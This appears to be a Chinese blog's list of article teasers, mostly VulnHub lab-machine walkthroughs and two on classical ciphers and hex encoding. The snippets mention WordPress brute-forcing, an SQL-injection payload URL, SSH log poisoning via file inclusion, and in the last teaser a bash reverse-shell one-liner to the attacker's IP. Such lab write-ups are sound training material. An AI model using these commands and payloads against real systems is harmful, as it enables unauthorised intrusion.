靶机介绍官方下载地址:http://www.vulnhub.com/entry/ck-00,444/难度是容易的,建议使用VirtualBox运行靶机 个人博客地址:http://www.sword-blogs.com/ 运行环境靶机:网络设为桥接,IP地址:192.168.1.90攻击机:同网段下的kalilinux,IP地址:192.168.1.37开始渗透将靶机运行起来靶机运行界面就已经告诉了IP地址,接下来就是扫描端口了这里看到22端口是ssh服务,密钥的加密方式是rsa80端口的架构是wordpress使用wpscan对wordpress扫描,发现有一个用户admin爆破admin用...

  6k0GrpdiCjYb   2023年11月13日   32   0   0 CTF网络安全webvulnhub靶机

个人博客地址: http://www.sword-blogs.com/ 下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 信息搜集 获取IP地址 扫描端口 80端口 点击website跳转到/jabc在jabc/?q=node/7页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录/jabcd0cs/访问/jabcd0cs/在/jabcd0cs/发现CMS的版本,使用searchsploit查询这里看到了pyload http://[host]/ajax_udf.php?q=1&add_value=odm_us...

  6k0GrpdiCjYb   2023年11月13日   39   0   0 网络安全webvulnhub靶机

个人博客地址:   http://www.sword-blogs.com/运行环境靶机:网络设为桥接,IP地址为192.168.34.154攻击机:同网段下的kalilinux,IP地址为192.168.34.153开始渗透:将靶机运行起来获取靶机IP地址扫描端口访问80端口源码提示了一个php文件有文件包含访问输入参数并成功包含这里可以看到有两个普通用户和一个root用户包含ssh日志文件成功包含将一句话当作用户名登录ssh密码随便输成功将一句话写到ssh日志文件当中查看当前文件夹下面的内容c2VjcmV0cw/Swordofgryffindor发现了一个密文可...

  6k0GrpdiCjYb   2023年11月13日   38   0   0 网络安全webvulnhub靶机

(文章目录) 前言 栅栏密码是一种简单的加密方式,是将明文按照一定方式排列,然后按照规定的方式读取密文。具体方式为:将明文中的字符按照设定的间隔排列成一个矩形,然后按照行或列的顺序读取。 凯撒密码也称移位密码,是一种简单的加密方法,将明文中每个字母向后移动固定的位数,得到密文。例如,向后移动3位,则明文的A变成D,B变成E,C变成F,以此类推。 凯撒密码和栅栏密码都是古典密码中常用的技术。凯撒密码是字母替换密码中最简单的一种,也是最为简单的一种字母替换密码。栅栏密码也是一种古典的密码技术,通过在明文中插入一个或多个在字母表上排列的栅栏,再将明文从上往下填充栅栏中的位置,最后将密文从左往右按照...

  6k0GrpdiCjYb   2023年11月02日   52   0   0 CTF密码技术网络安全大赛

(文章目录) 前言 把明文转换为16进制编码的步骤如下: 将明文中的每个字符转换为其对应的ASCII码。 将ASCII码转换为16进制编码。 例如,如果明文为"Hello",则转换为16进制编码后为"48656C6C6F"。 将16进制编码转换为10进制数的步骤如下: 将16进制编码每两个字母分组。 将每个字母转换为其对应的10进制数。 将每组字母转换后的10进制数相加,得到最终的10进制数。 例如,对于转换后的16进制编码"48656C6C6F",将其每两个字母分组为"48","65","6C","6C","6F"。将每组字母转换为10进制数得到"72","101","108","1...

  6k0GrpdiCjYb   2023年11月02日   58   0   0 CTF网络安全python16进制进制

靶机介绍 官方下载地址:http://www.vulnhub.com/entry/tophatsec-freshly,118/这个靶机需要在virtualbox导入,在VMware一直是导入失败 运行环境 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.87攻击机:通网段下的kalilinux,IP地址:192.168.1.37开始渗透将靶机运行起来 获取IP地址 扫描端口 80端口 访问80端口,是一张图片8080端口是一个链接,点击链接之后是wordpress站点使用工具扫描发现该站点确实存在wordpress漏洞进入wordpress的登录页面,使用弱密码无法登录 漏洞...

  6k0GrpdiCjYb   2023年11月02日   59   0   0 phpweb提权kalivulnhub靶机

靶机介绍官方下载地址:http://www.vulnhub.com/entry/acid-server,125/这个靶机的目标是获取root目录的的flag,运行环境靶机:网络连接方式设为NAT,IP地址:192.168.174.134攻击机:同网段下的kaliLinux系统,IP地址为:192.168.174.135开始渗透运行靶机获取靶机IP地址扫描端口及其服务看到只开启了33447端口,是web服务访问33447端口,在源代码中发现了0x643239334c6d70775a773d3d16进制数编码解密之后时base64编码解码之后得到wow.jpg尝试访问,发现无法访问,可能是在其他目...

  6k0GrpdiCjYb   2023年11月02日   53   0   0 php网络安全webvulnhub靶机

个人博客地址:http://www.sword-blogs.com/运行环境靶机:网络设为桥接,IP地址为192.168.34.154攻击机:同网段下的kalilinux,IP地址为192.168.34.153开始渗透:将靶机运行起来获取靶机IP地址扫描端口访问80端口源码提示了一个php文件有文件包含访问输入参数并成功包含这里可以看到有两个普通用户和一个root用户包含ssh日志文件成功包含将一句话当作用户名登录ssh密码随便输成功将一句话写到ssh日志文件当中查看当前文件夹下面的内容c2VjcmV0cw/Swordofgryffindor发现了一个密文可能是lestrange用户的密码c2...

  6k0GrpdiCjYb   2023年11月02日   58   0   0 CTF网络安全笔记vulnhub靶机

个人博客地址: http://www.sword-blogs.com/ 靶机介绍官方下载地址:https://www.vulnhub.com/entry/billu-b0x,188/这个靶机没有flag,进入root目录就算完成,关于本地文件包含的运行环境:靶机:网络连接方式设为桥接,IP地址:192.168.124.25攻击机:通网段下的kalilinux,IP地址:192.168.124.24开始渗透获取IP地址扫描端口扫描目录,使用多个工具一起扫,或者跟换字典扫描开始访问页面80端口首页是一个登录页面,提示我们SQL注入使用万能密码和sqlmap注入都没有注入成功,访问其他页面...

  6k0GrpdiCjYb   2023年11月02日   52   0   0 网络安全web笔记vulnhub靶机

个人博客地址:  http://www.sword-blogs.com/下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash-c'execbash-i&>/dev/tcp/192.168.1.140/4444<&1'...

  6k0GrpdiCjYb   2023年11月02日   56   0   0 CTF网络安全webvulnhub靶机
关注 更多

空空如也 ~ ~

粉丝 更多

空空如也 ~ ~